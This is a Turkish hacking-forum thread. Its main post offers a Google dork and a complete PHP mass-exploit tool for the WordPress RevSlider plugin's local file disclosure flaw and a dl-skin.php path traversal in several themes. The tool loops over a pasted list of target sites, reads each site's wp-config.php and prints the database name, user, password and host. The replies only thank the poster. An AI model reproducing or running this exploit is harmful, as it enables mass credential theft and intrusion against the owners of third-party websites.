Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Wordpress RevSlider Plugin LFD
#1
# Google Dork: inurl:/admin-ajax.php?action=revslider_show_image

Exploid

Kod:
<html>
<head>
<title>Exploits Wordpress</title>
</head>
<body style="background-color: rebeccapurple;">

<pre><p><center style="color: aqua;">

=============================================================
= Exploits Wordpress RevSlider Plugin LFD Vuln =
= =
= Coded by FarbodEZRaeL =
= Iranhack Security team =
= www.iranhack.org =
= Fix bug Other Version =
=============================================================

<pre><href>
<form method='POST'>
<textarea name='sites' cols='45' rows='0'></textarea>
<br>
<input type='submit' value='Exploit' />
</form>

<?php

# Coded by FarbodEZRaeL
# Exploits Wordpress RevSlider Plugin LFD Vuln
@set_time_limit(0);
error_reporting(0);
$sites = explode("\r\n", $_POST['sites']);

foreach($sites as $site) {

$site = trim($site);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$site");
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$get = curl_exec($ch);
curl_close($ch);
if(preg_match("#WordPress (.*?)/>#", $get, $version)){
$str = str_replace('/>', "", $version[0]);
$str = str_replace('"', "", $str);
}
$users = @file_get_contents("$site/?author=1");
preg_match('/<title>;(.*?)<\/title>/si',$users,$user);
$wpuser = explode('|',$user[1]);
echo " <br>======================================</br>";
echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version :
".$str."<br>";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,
"$site/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$xp = curl_exec ($ch);
curl_close($ch);
if(preg_match("#DB_USER#i",$xp)){
preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
echo "DB_NAME:{$DB_NAME[1]}<br>";
preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
echo "DB_USER:{$DB_USER[1]}<br>";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
echo "DB_HOST:{$DB_HOST[1]}<br>";

}

$lt =
array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-
skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/
dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scr
ipts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/
scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib
/scripts/dl-skin.php");
foreach($lt as $l){
$site = "$site/$l";
$process = curl_init($site);
curl_setopt($process, CURLOPT_TIMEOUT, 30);
curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
curl_setopt($process, CURLOPT_HEADER, TRUE);
curl_setopt($process, CURLOPT_POST, 1);
curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php");
curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
$return = curl_exec($process);
if(preg_match("#DB_USER#i",$return)){
preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
echo "DB_NAME:{$DB_NAME[1]}<br>";
preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
echo "DB_USER:{$DB_USER[1]}<br>";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
echo "DB_HOST:{$DB_HOST[1]}<br>";
break;
echo " <br>-----------------------------------</br>";
ob_implicit_flush(true);
ob_end_flush();
}
}
}

?>
</pre></p></center>
Beğenenler:
#2
eline sağlık exciting
Beğenenler:
#3
(05-01-2015, Saat: 18:36)Hacker Peyami Adlı Kullanıcıdan Alıntı: eline sağlık exciting


Eyw kiss
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WordPress TimThumb Dorkları + Cyberizme Özel KingSkrupellos 75 4,405 5 saat önce
Son Yorum: TiqReGo
  WordPress TheAgency Teması Dosya Yükleme Açığı KingSkrupellos 11 194 05-12-2016, Saat: 18:42
Son Yorum: the_zizil
  Wordpress "Js Support Ticket" File Upload Bypass Extensions Mr.F92 16 540 03-12-2016, Saat: 00:10
Son Yorum: Slowycan
  WP Premium Gallery Manager Plugin Dosya Yükleme Açığı KingSkrupellos 7 112 27-11-2016, Saat: 15:07
Son Yorum: Efetimi
  WordPress store theme Upload Acıgı archavin 72 4,777 24-11-2016, Saat: 17:33
Son Yorum: Mrxxx
Anahtar Kelimeler

Wordpress RevSlider Plugin LFD indir, Wordpress RevSlider Plugin LFD Videosu, Wordpress RevSlider Plugin LFD Online izle, Wordpress RevSlider Plugin LFD Bedava indir, Wordpress RevSlider Plugin LFD Yükle, Wordpress RevSlider Plugin LFD Hakkında, Wordpress RevSlider Plugin LFD Nedir, Wordpress RevSlider Plugin LFD Free indir, Wordpress RevSlider Plugin LFD Oyunu, Wordpress RevSlider Plugin LFD Download


1 Ziyaretçi